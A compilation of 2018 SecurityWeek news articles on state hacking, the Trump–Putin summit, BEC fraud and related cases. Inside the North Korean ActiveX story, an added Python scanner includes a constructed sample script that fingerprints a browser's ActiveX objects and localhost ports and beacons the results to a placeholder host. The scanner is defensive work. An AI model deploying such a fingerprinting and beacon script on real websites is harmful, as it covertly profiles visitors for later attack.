The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the November 2016 vote and whether any members of Trump's campaign team colluded with Moscow.

Russia's National Vulnerability Database Slow, Incomplete
19.7.18 securityweek BigBrothers

Russia’s national vulnerability database is slow, incomplete and it focuses on security flaws that could pose a threat to the country’s IT systems, according to an analysis conducted by threat intelligence firm Recorded Future.

After analyzing the national vulnerability databases of the United States and China, Recorded Future has decided to take a look at Russia’s database, known as the BDU. The BDU is maintained by the Federal Service for Technical and Export Control of Russia (FSTEC), an agency whose role is to protect state secrets and provide support for counterespionage and counterintelligence missions.

Researchers discovered significant differences both in the number of vulnerabilities and the time it takes to add them to the database, compared to the databases run by China and the United States. For instance, while the US’s NVD stored information on nearly 108,000 security holes, the BDU only documented just over 11,000 flaws in March, when Recorded Future conducted its analysis.

As for the time it takes for a vulnerability to be included in the BDU, the average is 95 days, much more than in the United States (45 days) and China (11 days).

While Russia’s database only covers roughly 10 percent of known vulnerabilities, there are certain pieces of software and certain types of bugs that seem more important to the maintainers of the database.

Software vulnerabilities covered above average in Russia's national vulnerability database

Researchers noticed that the BDU stores information on 61 percent of the vulnerabilities known to have been exploited by Russia-linked advanced persistent threat (APT) groups in their campaigns. This is in contrast to China, whose CNNVD database hides or delays flaws exploited by the country’s intelligence services.

While the vulnerabilities exploited by Russia-linked APTs affect some of the world’s most widely used software, their presence in the vulnerability database suggests that the systems of the Russian government also run these programs, especially since FSTEC’s mission is to protect government systems. This also provides insight into the applications used by the Russian government.

Moreover, Recorded Future points out it’s also possible that hackers sponsored by the Russian military leverage vulnerabilities in the BDU in their operations, or that the military may be obligated to protect the state’s IT systems by providing information on these flaws.

“The public record and available data is not yet sufficient to determine the relationship between FSTEC and Russian state-sponsored cyber operations,” Recorded Future said in its report.

On the other hand, while the BDU covers many vulnerabilities affecting Adobe products, even in this category the database is incomplete. According to researchers, there are over 1,200 Adobe bugs with a CVSS score higher than 8 that are not present in Russia’s database.

So why waste resources on an incomplete and very slow vulnerability database?

A lack of resources could be an explanation, but analysts note that FSTEC has over 1,100 employees, nearly triple compared to the US’s NIST Information Technology Laboratory (ITL), which maintains the country’s NVD.

Another possible scenario is that FSTEC has both an offensive and defensive mission and its database covers vulnerabilities based on competing needs. However, experts believe this theory is not accurate either considering that the agency is not a public service organization, as its main mission is to protect state and critical infrastructure systems and support counter intelligence initiatives.

The most likely scenario, Recorded Future believes, is that the BDU is “simply a baseline for government information systems security and software inspections.”

One of the roles of FSTEC is to review the software of foreign companies that want to sell their products in Russia. This includes firewalls, antiviruses and applications that use encryption.

“FSTEC is a military organization and is publishing ‘just enough’ content to be credible as a national vulnerability database. The Russian government needs vulnerability research as a baseline for FSTEC’s other technical control responsibilities, such as requiring reviews of foreign software,” the threat intelligence firm said.

North Korean Hackers Launch New ActiveX Attacks
19.7.18 securityweek BigBrothers

Watering Hole Attacks Target South Korean Users With ActiveX Exploits

A new series of reconnaissance attacks targeting ActiveX objects has been associated with the North Korean-linked Andariel group, a known branch of the notorious Lazarus Group.

In May, the group was observed exploiting an ActiveX zero-day vulnerability in a series of attacks on South Korean targets, mainly for reconnaissance purposes. A script injected into compromised websites would identify the visitors’ operating system and browser and, if Internet Explorer was detected, check for ActiveX and running plugins from a specific list of ActiveX components.

Highly active in recent months, the Andariel group has apparently launched a new reconnaissance attack against South Korean targets, by injecting their code into four other compromised websites. The attack, which was spotted on June 21, attempts to collect different object information than before.

Despite targeting objects it wasn’t targeting before, the newly discovered script is similar to the one used in May, which led Trend Micro to the conclusion that the same group of hackers is behind both campaigns.

Previously, the group collected targeted ActiveX objects on users’ Internet Explorer browser and only launched the zero-day exploit after identifying the right targets.

“Based on this, we believe it’s likely that the new targeted ActiveX objects we found could be their next targets for a watering hole exploit attack,” Trend Micro explains.

The new attack lasted until June 27 and targeted the visitors of a Korean non-profit organization’s website and those of three South Korean local government labor union websites.

The injected script, which had similar obfuscation and structure as the Andariel-linked script found in May, was designed to collect visitor information such as browser type, system language, Flash Player version, Silverlight version, and multiple ActiveX objects.

According to Trend Micro, the script was attempting to detect two additional ActiveX objects that were not previously targeted, namely one related to a DRM (Digital Rights Management) software from a South Korean Document Protection Security vendor and another related to a South Korea-based voice conversion software company.

The script also included code that opens a WebSocket connection to localhost. “The voice conversion software has websocket service listening on the local host so the injected script can detect the software by checking if they can establish a connection to ports 45461 and 45462, which the software uses,” Trend Micro explains.

The websocket verification, the security researchers say, could also be performed on Chrome and Firefox, in addition to Internet Explorer, which would suggest that the hackers have expanded their target base, aiming at the software and not just the ActiveX objects.

“Based on this change, we can expect them to start using attack vectors other than ActiveX,” Trend Micro notes.
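How the reconnaissance pattern described above can be spotted in page source, as an added example that is not Trend Micro’s code: a small scanner that pulls out the indicators the article lists, ActiveX objects instantiated by literal ProgID, Flash and Silverlight version probes, WebSocket connections to localhost ports (45461 and 45462 are the ports the article names), and some means of reporting the result to a remote host. SAMPLE_INJECTED is a constructed imitation of the technique, not the actual Andariel script; the ProgID Example.DRMClient.1 and the host example.invalid are placeholders, while ShockwaveFlash.ShockwaveFlash, AgControl.AgControl and Microsoft.XMLHTTP are the real ProgIDs for Flash, Silverlight and the legacy IE XMLHTTP object.

```python
"""Scan page source for the watering-hole reconnaissance pattern described above.

Added example, not Trend Micro's code. SAMPLE_INJECTED is a constructed imitation
of the technique (literal ActiveX probes, plugin checks, localhost WebSocket probes,
a callback), not the real Andariel script; "Example.DRMClient.1" and example.invalid
are placeholders.
"""
import re

# new ActiveXObject("Vendor.ProgID") with a literal name.
ACTIVEX_LITERAL = re.compile(r"""new\s+ActiveXObject\s*\(\s*["']([^"']+)["']""")
# ws:// or wss:// URL pointing at the loopback interface, with an optional port.
LOOPBACK_WS_URL = re.compile(r"wss?://(?:localhost|127\.0\.0\.1|\[::1\])(?::(\d+))?", re.I)
# Plugin-version probes the article mentions (Flash Player, Silverlight).
PLUGIN_PROBES = {
    "flash": re.compile(r"ShockwaveFlash|Shockwave Flash", re.I),
    "silverlight": re.compile(r"AgControl\.AgControl|Silverlight", re.I),
}
# Ways a script can report the collected fingerprint to a remote host.
CALLBACK = re.compile(r"XMLHttpRequest|navigator\.sendBeacon|\bfetch\s*\(|new\s+Image\s*\(\s*\)")


def loopback_ws_ports(text):
    """Ports the script tries to reach over WebSocket on localhost.

    This probe works in Chrome and Firefox as well as IE, which is why it is
    worth treating as its own indicator rather than folding it into the ActiveX one.
    """
    if not re.search(r"\bWebSocket\b", text):
        return []
    return sorted({int(m.group(1)) for m in LOOPBACK_WS_URL.finditer(text) if m.group(1)})


def scan_script(text):
    """Extract the fingerprinting indicators from one script or page body."""
    return {
        "activex_progids": sorted(set(ACTIVEX_LITERAL.findall(text))),
        "loopback_ws_ports": loopback_ws_ports(text),
        "plugin_probes": sorted(name for name, rx in PLUGIN_PROBES.items() if rx.search(text)),
        "callback_capable": bool(CALLBACK.search(text)),
    }


def is_recon_script(text, min_progids=2):
    """Flag a script that both fingerprints (several ProgIDs, or loopback sockets) and can phone home."""
    found = scan_script(text)
    fingerprints = len(found["activex_progids"]) >= min_progids or bool(found["loopback_ws_ports"])
    return fingerprints and found["callback_capable"]


# --- constructed samples ---
SAMPLE_INJECTED = r"""
<script>
(function () {
  var found = [], ua = navigator.userAgent, lang = navigator.language;
  if (window.ActiveXObject || "ActiveXObject" in window) {
    try { new ActiveXObject("ShockwaveFlash.ShockwaveFlash"); found.push("flash"); } catch (e) {}
    try { new ActiveXObject("AgControl.AgControl"); found.push("silverlight"); } catch (e) {}
    try { new ActiveXObject("Example.DRMClient.1"); found.push("drm"); } catch (e) {}   // placeholder ProgID
  }
  ["ws://127.0.0.1:45461", "ws://127.0.0.1:45462"].forEach(function (u) {
    try { var s = new WebSocket(u); s.onopen = function () { found.push(u); s.close(); }; } catch (e) {}
  });
  setTimeout(function () {
    new Image().src = "https://example.invalid/c?" + encodeURIComponent(ua + "|" + lang + "|" + found.join(","));
  }, 1500);
})();
</script>
"""

SAMPLE_BENIGN = r"""
<script>
// Legacy XHR shim: one ActiveX ProgID, no localhost probe, nothing collected.
var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
</script>
"""

if __name__ == "__main__":
    for name, src in (("injected", SAMPLE_INJECTED), ("benign", SAMPLE_BENIGN)):
        print(name, is_recon_script(src), scan_script(src))
```

The ProgID extractor only sees literal names; a script that loops over an array of ProgIDs or builds the loopback URL from a list of port numbers will show up only through the other indicators, so in practice the quoted-string heuristic should be widened to ProgID-shaped strings near an ActiveXObject call. The benign shim is included to show why a single ActiveX reference with no callback must not trip the rule: the combination of several probes and an exfiltration path is the signal, not ActiveX use on its own.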

At Summit, Trump Refuses to Confront Putin on Vote Row
19.7.18 securityweek BigBrothers

President Donald Trump refused to confront Vladimir Putin over meddling in the US election at their first face to face summit, publicly challenging the findings of the US intelligence community and triggering bipartisan outrage at home.

The US and Russian presidents came out of their meeting in Helsinki Monday expressing desire for a fresh start between the world's leading nuclear powers and more talk on global challenges, after discussing an array of issues from Syria, Ukraine and China to trade tariffs and the size of their nuclear arsenals.

There were indications of an arrangement to work together and with Israel to support a ceasefire in southern Syria, suggesting that the US administration is backing off its demand that Moscow's ally Bashar al-Assad step down.

If that is anathema to many in Washington, Trump's apparent concessions to Putin over the election controversy drew stinging condemnation from across the political divide.

Standing alongside the Kremlin boss at a joint news conference, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Hillary Clinton in 2016.

But, insisting he had won the race fair and square, the wealthy property tycoon said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."

Friday's US indictment of 12 Russian military intelligence agents exploded with embarrassing timing for Trump as he prepared to meet Putin. On Monday, officials said another Russian agent had been arrested for seeking to influence US politics.

But the US leader insisted that his counterpart had delivered a "powerful" denial of any Russian manipulation, and that the investigation by special counsel Robert Mueller was proving a "disaster" for the United States.

In his own interview with Fox, Trump said he was "fascinated" by an offer from Putin for US agents to indirectly grill the indicted Russians by submitting their questions to Russian officials but said Mueller's team "probably won't want to go" to Moscow.

- 'Never interfered' -

Trump again denied any collusion between his campaign and the Kremlin, while Putin insisted: "The Russian state has never interfered and is not planning to interfere in the USA's internal affairs."

As criticism mounted, Trump tweeted from Air Force One on his way home from Finland that he had "GREAT confidence in MY intelligence people".

"However, I also recognize that in order to build a brighter future, we cannot exclusively focus on the past – as the world’s two largest nuclear powers, we must get along."

Angry criticism of his disavowal of his own intelligence agencies came even from within Trump's Republican Party.

Senior Republican Senator John McCain was particularly scathing, saying: "Coming close on the heels of President Trump's bombastic and erratic conduct towards our closest friends and allies in Brussels and Britain, today's press conference marks a recent low point in the history of the American presidency."

Director of National Intelligence Dan Coats distanced himself from his boss, issuing a statement saying the US intelligence community's judgment that Russia interfered in the 2016 election was "clear".

But the top Democrat in the US Senate, Chuck Schumer, tweeted that many Americans can only wonder if "the only possible explanation for this dangerous behaviour is the possibility that President Putin holds damaging information over President Trump."

And former CIA director John Brennan said Trump's behavior at the news conference "rises to & exceeds the threshold of 'high crimes & misdemeanors.' It was nothing short of treasonous."

Putin denied the notion that Russian spy bosses may hold compromising information on Trump, who in his previous business career oversaw the Miss Universe pageant in Moscow in 2013.

"Please get this rubbish out of your heads," the Russian leader said.

In a post-summit interview with Fox News, Putin said US-Russia relations should not be held "hostage" to "internal political games," referring to the Mueller probe.

The two leaders appeared relaxed at the Helsinki news conference, smiling on occasion, in contrast to their sombre demeanour at the start of the day.

Trump, bent on forging a personal bond with the Kremlin chief despite the election allegations, went into the summit blaming the "stupidity" of his predecessors for plunging ties to their present low.

His manner towards Putin was also a contrast to the anger Trump flashed at NATO allies at a combative summit of the alliance in Brussels last week, which critics said would only hearten Putin.

- 'Only the beginning' -

A post-NATO trip to Britain, supposedly America's partner in a "special relationship", was riddled with controversy as well.

In Helsinki, however, Trump was determined to accentuate the positive, as was Putin.

The two leaders met one-on-one for more than two hours, with just their interpreters present, before they were joined by their national security teams.

Many in Washington were agog at Trump's decision to sit alone with Putin, worried about what he might give away to the former KGB spymaster, after previously cosying up to the autocratic leaders of China and North Korea.

But Trump, convinced his unique brand of diplomacy can win over Putin, pressed ahead and looked forward to "having an extraordinary relationship" as the pair sat down to discuss global hotspots.

- 'Foolishness and stupidity' -

Trump began the day by firing a Twitter broadside at his domestic opponents, blaming the diplomatic chill on the election investigation.

"Our relationship with Russia has NEVER been worse thanks to many years of U.S. foolishness and stupidity and now, the Rigged Witch Hunt!" Trump tweeted.

Russia's foreign ministry tweeted in response: "We agree."

In a weekend interview with CBS News, Trump admitted that Russia remains a foe, but he put Moscow on a par with China and the European Union as economic and diplomatic rivals.

Irish Silk Road Suspect Extradited to US: Prosecutors
19.7.18 securityweek BigBrothers

A 30-year-old Irish man accused of working for now defunct "dark web" marketplace Silk Road has been extradited to the United States to face charges in New York, four years after his arrest, prosecutors announced Friday.

Gary Davis, who went by the alias "Libertas," was allegedly a Silk Road administrator in 2013 -- and was paid a weekly salary to carry out duties that included resolving disputes between drug dealers and buyers on the site.

He is charged with one count of conspiracy to distribute narcotics, which carries a maximum sentence of life in prison, one count of conspiracy to commit computer intrusion and one count of conspiracy to commit money laundering.

The Wicklow man, who was arrested in January 2014, appeared before a Manhattan federal court on Friday.

"Thanks to our partner agencies here and abroad, Davis now faces justice in an American court," said Manhattan US Attorney Geoffrey Berman.

Until the FBI shut it down in October 2013, the US government called Silk Road "the most sophisticated and extensive criminal marketplace on the Internet" used by vendors in more than 10 countries in North America and Europe.

Texan mastermind Ross Ulbricht was convicted and sentenced to life in prison in 2015 for running the online enterprise that sold $200 million in drugs worldwide.

Operating under the alias "Dread Pirate Roberts," Ulbricht amassed $13 million in commissions by making the purchase of heroin, cocaine and crystal meth as easy as shopping online at eBay or Amazon, the government said.

His four-week trial was considered a landmark case in the murky world of online crime and government surveillance.

Back in Washington, Trump Under Pressure to Reverse Course on Russia
19.7.18 securityweek BigBrothers

President Donald Trump found himself isolated and under pressure to reverse course Tuesday after publicly challenging the US intelligence conclusion that Russia meddled in the 2016 election during his face-to-face with Vladimir Putin.

At his inaugural summit with the Russian president in Finland, Trump appeared to accept at face value the strongman's denial that Moscow interfered in a bid to undermine the Democrat Hillary Clinton -- a stance that triggered bipartisan outrage at home.

Back in Washington, Trump sounded a defensive note, insisting his meeting with Putin had been "even better" than his one last week with traditional allies NATO -- a testy gathering seen as having badly strained trans-Atlantic ties.

But the US president -- who is expected to speak about the meeting at 2:00 pm (1800 GMT) on Tuesday -- has found precious little support for his decision not to confront Putin, and faced calls even from allies to change tack.

"He has to reverse course immediately and he's gotta get out there as soon as possible before the concrete starts to set on this," former White House communications director Anthony Scaramucci said on CNN.

"Loyalty right now requires you to tell the truth and sit with him and explain to him the optics of the situation, why the optics are bad, the strategy in terms of trying to get along with Vladimir Putin and deploying a strategy of going against the intelligence agency is very bad," Scaramucci said.

Former House speaker and longtime Trump ally Newt Gingrich put it yet more bluntly.

"President Trump must clarify his statements in Helsinki on our intelligence system and Putin," he tweeted as Trump headed home. "It is the most serious mistake of his presidency and must be corrected -- immediately."

Trump's performance at the summit has even come under fire from the hosts at Fox News, usually a reliable defender of the president.

"No negotiation is worth throwing your own people and country under the bus," Fox anchor and Fox & Friends co-host Abby Huntsman -- the daughter of the US ambassador to Russia -- wrote on Twitter.

And former president Barack Obama, who has remained above the political fray since leaving office, appeared to allude to the events of the day before during a rare public appearance Tuesday at which he warned the world had plunged into "strange and uncertain times."

"Strongman politics are ascendant, suddenly, whereby elections and some pretense of democracy are maintained -- the form of it -- but those in power seek to undermine every institution or norm that gives democracy meaning," Obama said in Johannesburg.

- 'Undermine democracy' -

Trump and Putin met for two hours in Helsinki on Monday with only their interpreters present, then held a joint press conference.

Standing alongside the Kremlin boss, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Clinton in 2016.

But, insisting he had won the race fair and square, the Republican said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."

Special Counsel Robert Mueller's investigation into Russian meddling and possible collusion with the Trump campaign has increasingly put pressure on the White House, and the president -- who regards it as an attack on his legitimacy -- has dubbed it a "witch hunt."

But the investigation continues to progress, resulting in the indictment of 12 Russian military intelligence agents on Friday -- timing that was embarrassing in light of the upcoming summit.

While Trump has faced intense criticism over Helsinki, he is not entirely without defenders.

Republican Senator Rand Paul has given a series of interviews supporting Trump's stance towards Putin, and berating his critics as biased.

"I think the president did a good thing by meeting with Putin and I think it's a mistake for people to try to turn this into a partisan escapade," the Kentucky Republican said on CBS.

Paul's efforts drew praise from Trump, who tweeted: "Thank you @RandPaul, you really get it!"

But the bipartisan consensus has been broadly hostile to Trump's stance -- as the top Republican in Congress, House Speaker Paul Ryan made clear once more at a press conference Tuesday on Capitol Hill.

"We stand by our NATO allies and all those countries who are facing Russian aggression," Ryan said. "Vladimir Putin does not share our interests, Vladimir Putin does not share our values."

"We just conducted a yearlong investigation into Russia's interference in our elections. They did interfere in our elections. It's really clear. There should be no doubt about that," he said.

"Russia is trying to undermine democracy itself."

NIST to Withdraw 11 Outdated Cybersecurity Publications
19.7.18 securityweek BigBrothers

The U.S. National Institute of Standards and Technology (NIST) announced on Tuesday that its Computer Security Division has decided to withdraw eleven outdated SP 800 publications.

NIST’s 800 series Special Publications (SP) focus on cybersecurity and include guidelines, technical specifications, recommendations, and annual reports. These publications are meant to address and support the security and privacy needs of government agencies, but they are often used and referenced by private sector companies.

NIST’s website currently lists over 180 SP 800 publications, including drafts and final versions. Eleven of them, which are now considered out of date, will be withdrawn on August 1, 2018, and will not be revised or superseded.

The documents will still be available for historical reference, but their status will be changed from “final” to “withdrawn.”

The following SP 800 publications will be withdrawn, with the reason for withdrawal listed for each document:

● SP 800-13 (October 1995): Telecommunications Security Guidelines for Telecommunications Management Network – describes outdated technologies;

● SP 800-17 (February 1998): Modes of Operation Validation System (MOVS): Requirements and Procedures – validation system is for deprecated algorithms, such as DES and Skipjack;

● SP 800-19 (October 1999): Mobile Agent Security – environments and technologies far less complex than what is used today;

● SP 800-23 (August 2000): Guidelines to Federal Organizations on Security Assurance and Acquisition/Use of Tested/Evaluated Products – based on outdated laws, regulations and executive directives;

● SP 800-24 (April 2001): PBX Vulnerability Analysis: Finding Holes in Your PBX Before Someone Else Does – does not address newer technologies, such as VOIP;

● SP 800-33 (December 2001): Underlying Technical Models for Information Technology Security – describes a model that pre-dates the Risk Management Framework and Cybersecurity Framework;

● SP 800-36 (October 2003): Guide to Selecting Information Technology Security Products – outdated references; does not reflect current types of security products;

● SP 800-43 (November 2002): Systems Administration Guidance for Securing Windows 2000 Professional System – Windows 2000 no longer supported;

● SP 800-65 (January 2005): Integrating IT Security into the Capital Planning and Investment Control Process – pre-dates the Cybersecurity Framework and other important SP 800 guidance;

● SP 800-68 Rev. 1 (October 2008): Guide to Securing Microsoft Windows XP Systems for IT Professionals: A NIST Security Configuration Checklist – Windows XP no longer supported;

● SP 800-69 (September 2006): Guidance for Securing Microsoft Windows XP Home Edition: A NIST Security Configuration Checklist – Windows XP no longer supported.

US Lifts Export Ban on Suppliers to China's ZTE
18.7.18 securityweek  BigBrothers

The United States on Friday formally lifted a crippling ban on exports to China's ZTE, rescuing the smartphone maker from the brink of collapse after it was denied key components.

The US Commerce Department said it would continue to monitor the company to prevent further violations of US sanctions on Iran and North Korea.

"While we lifted the ban on ZTE, the Department will remain vigilant as we closely monitor ZTE's actions to ensure compliance with all US laws and regulations," Commerce Secretary Wilbur Ross said in a statement.

But the move to reverse the harsh penalties, made at President Donald Trump's insistence, has left US lawmakers irate. Congress has taken steps to keep the ban in place and accused Trump of rewarding a company which had repeatedly flouted American law, lied to authorities and engaged in espionage.

The about-face to rescue the company created a stark contrast with the escalating trade war between Washington and Beijing.

The Commerce Department in April banned US companies from supplying ZTE with crucial components, forcing it to halt operations, after officials found further violations even after reaching a settlement in March of last year over the initial complaints.

The company had paid bonuses rather than reprimanding employees involved in illegal activity and created an "elaborate scheme" to deceive US officials and obstruct justice, US officials said.

But as a favor to Chinese President Xi Jinping, Trump ordered Commerce to ease the penalties on ZTE.

In an agreement struck last month, Washington agreed to lift the export ban if ZTE paid an additional $1 billion fine -- beyond the $892 million penalty imposed in 2017.

The company also was required to replace its board of directors, retain outside monitors and put $400 million in escrow to cover any future violations -- a final step it took this week.

In a statement this week, Senator Mark Warner of Virginia, the senior Democrat on the Select Committee on Intelligence, lambasted the reversal, saying the US military and spy agencies had branded ZTE an "ongoing threat" to US national security.

"This sweetheart deal not only ignores these serious issues, it lets ZTE off the hook for evading sanctions against Iran and North Korea with a slap on the wrist," Warner said.

BEC Scam Losses Top $12 Billion: FBI
18.7.18 securityweek  BigBrothers

The losses and potential losses reported as a result of business email compromise (BEC) and email account compromise (EAC) scams exceed $12 billion globally, according to an alert published last week by the FBI.

The report is based on data collected by the FBI’s Internet Crime Complaint Center (IC3), international law enforcement and financial institutions between October 2013 and May 2018. The amounts represent both money that was actually lost by victims and money they could have lost had they taken the bait.

BEC scams, which involve sending requests for fund transfers and personally identifiable information from hijacked business email accounts, have been observed in 50 U.S. states and 150 countries, with money being sent to 115 countries.

The top destinations for money generated by BEC scams are Asian banks in China and Hong Kong, but a significant number of schemes involve financial organizations in the U.K., Mexico and Turkey.

According to the FBI, more than 78,000 complaints were made globally between October 2013 and May 2018, with over 41,000 victims reported in the United States. Targeted individuals and businesses lost or could have lost $12.5 billion, nearly $3 billion of it in the U.S. Losses increased by 136% between December 2016 and May 2018.

The number of non-U.S. victims known to the FBI is 2,565, with losses totaling over $670 million.

In comparison, the FBI’s previous report on BEC scams, which covered the period between October 2013 and December 2016, said there had been 40,203 incidents globally with exposed losses totaling over $5.3 billion.

In its recent 2017 Internet Crime Report, the FBI said IC3 received over 15,000 BEC and EAC complaints last year, reporting losses of $675 million.

The law enforcement agency highlighted that the real estate sector continues to be increasingly targeted. Victims include law firms, title companies, real estate agents, sellers, and buyers.

In scams targeting this sector, the fraudsters use spoofed emails on behalf of real estate transaction participants and instruct recipients to transfer money into fraudulent accounts.

“Based on victim complaint data, BEC/EAC scams targeting the real estate sector are on the rise,” the FBI said. “From calendar year 2015 to calendar year 2017, there was over an 1100% rise in the number of BEC/EAC victims reporting the real estate transaction angle and an almost 2200% rise in the reported monetary loss. May 2018 reported the highest number of BEC/EAC real estate victims since 2015, and September 2017 reported the highest victim loss.”

BEC scam losses in real estate sector

The topic of BEC scams and how the threat can be prevented using human-powered intelligence was covered recently in a SecurityWeek column by Josh Lefkowitz, CEO of business risk intelligence firm Flashpoint.

“BEC underscores why even the most technically sophisticated cyber defenses aren’t always a match for low-tech threats. Combating BEC requires more than just advanced technologies and robust perimeter security—it requires humans to understand the threat,” Lefkowitz said.

12 Russian Intelligence Officers Indicted for Hacking U.S. Democrats
18.7.18 securityweek  BigBrothers

Twelve Russian intelligence officers were indicted by a US grand jury on Friday -- just three days before President Donald Trump is scheduled to meet with Russia's Vladimir Putin -- for interfering in the November 2016 presidential election.

The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the 2016 vote and whether any members of Trump's campaign colluded with Moscow.

The indictment accuses members of Russia's military intelligence agency known as the GRU of carrying out "large-scale cyber operations" to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein, who announced the indictment at a press conference in Washington, said "there's no allegation in this indictment that any American citizen committed a crime."

Rosenstein said "the conspirators corresponded with several Americans during the course of the conspiracy through the internet."

However, "there's no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers," he said.

Rosenstein also stressed that "there's no allegation that the conspiracy changed the vote count or affected any election result."

Rosenstein said he briefed Trump about the indictment before Friday's announcement and that the timing was determined by "the facts, the evidence, and the law."

The deputy attorney general's press conference came as Trump was meeting Queen Elizabeth II and just three days before his meeting with Putin in Helsinki.

- Calls to cancel Putin meeting -

Senator Chuck Schumer, the Democratic Senate minority leader, immediately called on Trump to cancel the Putin talks.

"These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win," Schumer said in a statement.

"President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won't interfere in future elections," he said.

Speaking earlier Friday, before the indictments were announced, Trump said he would ask Putin about the allegations of Russian election meddling.

"I will absolutely, firmly ask the question, and hopefully we'll have a good relationship with Russia," he told a joint press conference with British Prime Minister Theresa May.

But he simultaneously denounced the Mueller investigation as a "rigged witch hunt," and said he has been "tougher on Russia than anybody."

"We have been extremely tough on Russia," Trump said.

The US president recalled that 60 intelligence officers were expelled from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

Russia has denied any involvement in the attack and rejected accusations that it interfered in the US presidential election in a bid to bring about the defeat of Democrat Hillary Clinton.

Rosenstein said 11 of the Russians indicted Friday were charged with "conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.

"One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections," he added.

"The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016," the deputy attorney general said.

"They also hacked into the computer networks of a congressional campaign committee and a national political committee."

Departing Apple Engineer Stole Autonomous Car Tech: FBI
18.7.18 securityweek  BigBrothers

An ex-Apple engineer on Monday was charged with stealing secrets from a hush-hush self-driving car technology project days before he quit to go to a Chinese startup.

Xiaolang Zhang was in custody for stealing trade secrets from the Apple project, according to a copy of the criminal complaint posted online.

The charge is punishable by 10 years in prison and a $250,000 fine.

"Apple takes confidentiality and the protection of our intellectual property very seriously," the California-based internet titan said in response to an AFP query.

"We're working with authorities on this matter and will do everything possible to make sure this individual and any other individuals involved are held accountable for their actions."

Zhang was hired by Apple in December of 2015 to be part of a team developing hardware and software for self-driving vehicles, a project that was a "closely-guarded secret," according to the complaint filed by the FBI.

Zhang took paternity leave in the month of April, going with his family to China.

Upon his return to Apple at the end of April, he told a supervisor he was quitting to return to China to be near his ailing mother.

Zhang mentioned he planned to go work for a Chinese self-driving vehicle startup called Xiaopeng Motors, or XMotors, in Guangzhou, according to the complaint.

The supervisor thought Zhang "evasive" and brought in an Apple product security team, which had Zhang turn in all company devices and walked him off campus, according to the filing.

Apple security found that Zhang's activity on the company network surged "exponentially" in the days before he returned from paternity leave.

Zhang did searches of confidential databases, and downloaded technical files, the criminal complaint said.

Documents downloaded by Zhang included some on topics such as "prototypes," according to the case against him.

Apple also had closed-circuit camera recording of Zhang going into autonomous driving tech team labs late on a Saturday night while he was on paternity leave, according to the filing.

Zhang later admitted to taking circuit boards and a Linux server from the hardware lab, and to transferring some Apple files to his wife's computer, the FBI said in the complaint.

Zhang was "voluntarily terminated" from Apple in early March, and FBI agents searched his home in June as part of their investigation.

Zhang told the FBI at that time he was working at XMotors offices in Silicon Valley, according to the complaint.

Zhang was heading to China with a "last-minute round-trip ticket" when FBI agents arrested him at an airport in the Silicon Valley city of San Jose, the filing said.

Outdated DoD IT Jeopardizes National Security: Report
18.7.18 securityweek  BigBrothers

Failure to Modernize Legacy DoD Systems is Putting U.S. National Security in Jeopardy, Report Claims

In a new study titled 'Innovation Imperative: The Drive to Modernize DoD', Meritalk queried 150 federal IT managers working in Department of Defense (DoD) organizations. The stated objective was "to understand the state of their IT infrastructure and applications." This was to include levels of satisfaction, an indication of where missions are being met or missed, and what should be done next.

In fact, this report is solely about DoD IT managers' attitude towards cloud migration -- which is perhaps unsurprising since the survey was underwritten by AWS and Red Hat.

The results confirm a strong belief that cloud is the way forward -- and perhaps the only way for the U.S. military to maintain an advantage over the world's other superpowers: China and increasingly Russia. For example, 80% of the respondents say the DoD needs to improve the use of cloud to maintain the military’s technical advantage and support mission success; and 81% say accelerating DoD’s adoption of cloud is critical.

86% of respondents said that failing to modernize legacy DoD systems is putting U.S. national security in jeopardy.

The increasing use of artificial intelligence and big data analytics by the military, the need for more efficient data sharing between agencies, and the power to transcribe and translate massive amounts of recorded voice in almost real time can only be served by the power and flexibility of the cloud.

Respondents to the survey specifically see DoD cloud adoption important for big data analytics (85%), electronic warfare (83%), shared services (82%), DevOps (81%), AI (77%), IoT (73%), machine learning (72%) and blockchain (61%). But this understanding is not new to the DoD.

The Joint Enterprise Defense Infrastructure (JEDI) initiative is a plan for the DoD to acquire its own commercial cloud infrastructure suitable to hold DoD data at all classification levels, and available to any organization in DoD. It is a massive project spread over a ten-year ordering period, and thought to have a budget of around $10 billion over that timeframe.

It is believed that the DoD's preference is to award the project to a single provider; and it is equally believed that AWS is the frontrunner. Smaller existing cloud providers would lose out, and have been lobbying for a multi-provider approach. Microsoft, Google and IBM are also rumored to be interested in bidding for the project.

There is little mention of JEDI within the Meritalk survey. However, 51% of the respondents said they believe that a single-vendor cloud solution has more pros than cons. Sixty-three percent said that talk about JEDI has had "a positive impact on the pace of their organization’s IT modernization efforts"; and "72% feel utilizing multiple cloud vendors would increase the complexity of their organization’s system integrations."

The Meritalk survey, underwritten by AWS and Red Hat, offers strong support for the DoD's single supplier JEDI preference, where AWS (most probably backed by Red Hat software) is the frontrunner.

But regardless of who wins the JEDI provider contract, the survey also demonstrates that DoD IT managers are ready to increase their migration to the cloud. More than 50% of the respondents would recommend moving 50% of their current data to the cloud (13% would move 'the vast majority' of their data). They are unlikely -- and in some cases for reasons of national security unable -- to adopt a cloud-only strategy.

This will set the DoD on a path directly parallel to that faced by commercial enterprises today: to what extent should existing infrastructures and data be migrated to the cloud, how can the migration be achieved, and how can the result be secured? The only primary difference is that the DoD already knows which cloud; that is, the JEDI cloud.

